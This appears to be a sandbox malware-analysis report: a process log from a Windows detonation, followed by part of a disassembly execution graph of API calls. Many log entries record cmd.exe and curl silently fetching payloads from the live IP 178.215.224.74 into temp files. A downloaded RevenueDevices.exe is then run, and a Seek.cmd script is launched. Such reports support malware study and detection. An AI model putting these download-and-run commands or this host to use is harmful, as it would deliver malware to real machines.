                                        Start time:14:00:31
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:64
                                        Start time:14:00:31
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:65
                                        Start time:14:00:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:66
                                        Start time:14:00:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:67
                                        Start time:14:00:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:68
                                        Start time:14:00:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:69
                                        Start time:14:00:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:70
                                        Start time:14:00:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:71
                                        Start time:14:00:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:72
                                        Start time:14:00:38
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:73
                                        Start time:14:00:38
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:74
                                        Start time:14:00:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:75
                                        Start time:14:00:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:76
                                        Start time:14:00:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:77
                                        Start time:14:00:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:78
                                        Start time:14:00:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:79
                                        Start time:14:00:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:80
                                        Start time:14:00:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:81
                                        Start time:14:00:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:82
                                        Start time:14:00:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:83
                                        Start time:14:00:45
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:84
                                        Start time:14:00:45
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:85
                                        Start time:14:00:45
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:86
                                        Start time:14:00:51
                                        Start date:21/11/2024
                                        Path:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
                                        Imagebase:0x400000
                                        File size:1'151'988 bytes
                                        MD5 hash:B487B5B51436B42576D60A1FE58F8399
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 58%, ReversingLabs
                                        Has exited:true

                                        General

                                        Target ID:87
                                        Start time:14:00:51
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:88
                                        Start time:14:00:51
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6eef20000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:89
                                        Start time:14:00:53
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:90
                                        Start time:14:00:53
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:91
                                        Start time:14:00:54
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:92
                                        Start time:14:00:55
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:93
                                        Start time:14:00:55
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:94
                                        Start time:14:00:55
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:95
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:96
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:97
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:98
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xc70000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:126
                                        Start time:14:01:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:141
                                        Start time:14:01:18
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:153
                                        Start time:14:01:21
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:195
                                        Start time:14:01:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:219
                                        Start time:14:01:44
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:222
                                        Start time:14:01:44
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:240
                                        Start time:14:01:47
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:243
                                        Start time:14:01:49
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:330
                                        Start time:14:02:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:342
                                        Start time:14:02:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:348
                                        Start time:14:02:14
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:390
                                        Start time:14:02:22
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:414
                                        Start time:14:02:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:429
                                        Start time:14:02:30
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:456
                                        Start time:14:02:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:489
                                        Start time:14:02:40
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:17.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:20.7%
                                          Total number of Nodes:1526
                                          Total number of Limit Nodes:32
                                          execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread 